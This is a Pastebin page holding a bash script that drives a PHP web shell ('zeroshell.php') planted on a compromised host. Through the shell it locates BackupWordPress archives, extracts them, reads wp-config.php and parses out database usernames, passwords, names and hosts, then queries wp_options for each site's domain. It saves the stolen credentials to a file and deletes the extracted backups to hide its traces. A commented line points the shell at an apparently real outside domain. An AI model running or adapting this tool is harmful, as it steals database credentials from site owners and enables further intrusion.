Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- SHELL="http://localhost/zeroshell.php";
- HOST=$(curl -s -d 'cmd=hostname' ${SHELL}"?ext=shellcmd" | sed "s|readonly>|\nHost: |g" | sed 's|</textarea>|\n|g' | grep 'Host:' | awk '{print $2}');
- echo '[GRABFROM] '$HOST;
- FILENAME='wpconfig_'${HOST}'.txt';
- function wpdomain() {
- user=$(echo ${1} | sed 's/@/%40/g' | sed 's/&/%26/g');
- pass=$(echo ${2} | sed 's/@/%40/g' | sed 's/&/%26/g');
- db=$(echo ${3} | sed 's/@/%40/g' | sed 's/&/%26/g');
- host=$(echo ${4} | sed 's/@/%40/g' | sed 's/&/%26/g');
- DOMAIN=$(curl -s -d "wpuser="${user} -d "wppass="${pass} -d 'wpdb='${db} -d 'wphost='${host} -X POST ${SHELL}"?grab=wp_options" | grep 'DOMAIN' | sed 's|\[DOMAIN\]|WP_Site:|g');
- echo $DOMAIN;
- echo $DOMAIN >> $FILENAME;
- }
- function miningblue() {
- CHK=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g' | wc -l);
- if [[ "$CHK" == "1" ]];then
- ASH=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep 'DB_USER' | sed "s|define('DB_USER', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_USER ||g');
- WPPASS=$(cat wp_config.php.temp | grep 'DB_PASSWORD' | sed "s|define('DB_PASSWORD', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_PASSWORD ||g');
- DBNAME=$(cat wp_config.php.temp | grep 'DB_NAME' | sed "s|define('DB_NAME', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_NAME ||g');
- WPHOST=$(cat wp_config.php.temp | grep 'DB_HOST' | sed "s|define('DB_HOST', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_HOST ||g');
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '-- CONFIG ANJING!';
- echo 'WP_User: '$WPUSER;
- echo 'WP_Pass: '$WPPASS;
- echo 'DB_Name: '$DBNAME;
- echo 'WP_Host: '$WPHOST;
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo 'WP_User: '$WPUSER;
- echo 'WP_Pass: '$WPPASS;
- echo 'DB_Name: '$DBNAME;
- echo 'WP_Host: '$WPHOST;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- else
- GRAB=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- count=0;
- for ASH in $(echo $GRAB)
- do
- count=$[count+1];
- echo '-- ['$count']';
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep 'DB_USER' | sed "s|define('DB_USER', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_USER ||g');
- WPPASS=$(cat wp_config.php.temp | grep 'DB_PASSWORD' | sed "s|define('DB_PASSWORD', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_PASSWORD ||g');
- DBNAME=$(cat wp_config.php.temp | grep 'DB_NAME' | sed "s|define('DB_NAME', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_NAME ||g');
- WPHOST=$(cat wp_config.php.temp | grep 'DB_HOST' | sed "s|define('DB_HOST', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_HOST ||g');
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '-- CONFIG ANJING!';
- echo 'WP_User: '$WPUSER;
- echo 'WP_Pass: '$WPPASS;
- echo 'DB_Name: '$DBNAME;
- echo 'WP_Host: '$WPHOST;
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo 'WP_User: '$WPUSER;
- echo 'WP_Pass: '$WPPASS;
- echo 'DB_Name: '$DBNAME;
- echo 'WP_Host: '$WPHOST;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- done
- fi
- }
- USRJUMP=$(curl -s ${SHELL}"?ext=backupwordpress" | grep -o '] <a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^] <a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- if [ -z "$USRJUMP" ];then
- echo "[BAD] FAILED GRAB!";
- else
- i=0;
- for USR in $(echo $USRJUMP)
- do
- i=$[i+1];
- echo '['$i'] '$USR;
- miningblue $USR
- echo '';
- done
- fi
- # curl -s "http://icgd2d.com/FOURMASTER/zeroshell.php" | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement